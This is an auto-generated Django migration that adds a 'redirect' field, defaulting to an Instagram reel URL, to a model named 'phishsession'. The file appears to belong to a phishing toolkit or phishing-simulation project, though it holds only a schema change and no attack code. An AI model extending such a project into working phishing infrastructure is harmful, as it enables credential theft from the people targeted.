# Generated by Django 5.2.3 on 2025-07-02 21:54

from django.db import migrations, models


class Migration(migrations.Migration):

    dependencies = [
        ('base', '0003_phishsession_is_online'),
    ]

    operations = [
        migrations.AddField(
            model_name='phishsession',
            name='redirect',
            field=models.TextField(default='https://www.instagram.com/reel/C4KRx6xMYhh/?hl=en'),
            preserve_default=False,
        ),
    ]
